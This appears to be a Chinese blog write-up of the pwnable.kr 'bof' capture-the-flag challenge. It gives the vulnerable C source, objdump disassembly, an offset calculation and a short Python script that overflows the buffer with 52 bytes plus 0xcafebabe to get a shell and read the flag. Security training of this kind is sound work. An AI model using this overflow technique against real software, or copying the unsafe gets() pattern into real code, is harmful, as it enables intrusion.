pwnable.kr [Toddler's Bottle] - bof
2017-03-11 22:47
477 查看
简单的栈溢出练习。
源码如下:
这里需要构造栈溢出,淹没至前一个栈帧的当前函数的参数位置。
linux下可以借助gdb进行动态调试,利用objdump进行静态反编译。
这里可使用objdump来静态查看栈分配情况
由题设只需关注main()和func()
可以发现
借助python库zio(an easy-to-use io library for pwning development, supporting an unified interface for local process pwning and TCP socket io.)写脚本跑出flag。
源码如下:
#include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; }
这里需要构造栈溢出,淹没至前一个栈帧的当前函数的参数位置。
linux下可以借助gdb进行动态调试,利用objdump进行静态反编译。
这里可使用objdump来静态查看栈分配情况
objdump -d bof:
由题设只需关注main()和func()
0000062c <func>: 62c: 55 push %ebp 62d: 89 e5 mov %esp,%ebp 62f: 83 ec 48 sub $0x48,%esp 632: 65 a1 14 00 00 00 mov %gs:0x14,%eax 638: 89 45 f4 mov %eax,-0xc(%ebp) 63b: 31 c0 xor %eax,%eax 63d: c7 04 24 8c 07 00 00 movl $0x78c,(%esp) 644: e8 fc ff ff ff call 645 <func+0x19> ; call printf() 649: 8d 45 d4 lea -0x2c(%ebp),%eax ; char[32] -- offset to ebp 64c: 89 04 24 mov %eax,(%esp) ; 传参 64f: e8 fc ff ff ff call 650 <func+0x24> ; call gets() 654: 81 7d 08 be ba fe ca cmpl $0xcafebabe,0x8(%ebp) 65b: 75 0e jne 66b <func+0x3f> 65d: c7 04 24 9b 07 00 00 movl $0x79b,(%esp) 664: e8 fc ff ff ff call 665 <func+0x39> 669: eb 0c jmp 677 <func+0x4b> 66b: c7 04 24 a3 07 00 00 movl $0x7a3,(%esp) 672: e8 fc ff ff ff call 673 <func+0x47> 677: 8b 45 f4 mov -0xc(%ebp),%eax 67a: 65 33 05 14 00 00 00 xor %gs:0x14,%eax 681: 74 05 je 688 <func+0x5c> 683: e8 fc ff ff ff call 684 <func+0x58> 688: c9 leave 689: c3 ret 0000068a <main>: 68a: 55 push %ebp 68b: 89 e5 mov %esp,%ebp 68d: 83 e4 f0 and $0xfffffff0,%esp 690: 83 ec 10 sub $0x10,%esp 693: c7 04 24 ef be ad de movl $0xdeadbeef,(%esp) 69a: e8 8d ff ff ff call 62c <func> 69f: b8 00 00 00 00 mov $0x0,%eax 6a4: c9 leave 6a5: c3 ret 6a6: 90 nop
可以发现
char overflowme[32]在当前栈帧中距离EBP的偏移为0x2c,即44,再加上ESP的4,返回地址的4,即从局部变量overflowme首地址52byte的位置即为当前函数的参数key的地址。
借助python库zio(an easy-to-use io library for pwning development, supporting an unified interface for local process pwning and TCP socket io.)写脚本跑出flag。
from zio import * host = "pwnable.kr" #143.248.249.64 port = 9000 io = zio((host, port), print_read=False, print_write=False) payload = "a"*52 + "\xbe\xba\xfe\xca" + "\n" io.write(payload+"\n") io.write("cat flag\n") buf = io.read_until("\n") print buf
$ python run.py daddy, I just pwned a buFFer :)
相关文章推荐
- pwnable.kr [Toddler's Bottle] - flag
- pwnable.kr [Toddler's Bottle] - uaf
- pwnable.kr [Toddler's Bottle] -fd
- pwnable.kr [Toddler's Bottle] - random
- pwnable.kr [Toddler's Bottle] - passcode
- pwnable 笔记 Toddler's Bottle - bof
- pwnable.kr [Toddler's Bottle] - collision
- pwnable.kr [Toddler's Bottle] - input
- pwnable.kr [Toddler's Bottle] - blackjack
- pwnable.kr [Toddler's Bottle] - leg
- pwnable.kr [Toddler's Bottle] - mistake
- pwnable.kr [Toddler's Bottle] - lotto
- pwnable.kr [Toddler's Bottle] - cmd1
- pwnable.kr [Toddler's Bottle] - shellshock
- pwnable.kr [Toddler's Bottle] - cmd2
- pwnable.kr [Toddler's Bottle] - codemap
- pwnable.kr [Toddler's Bottle] - coin1
- pwnable.kr-bof-Writeup
- PWN学习之[Toddler''s Bottle]-[bof]
- pwnable 笔记 Toddler's Bottle - input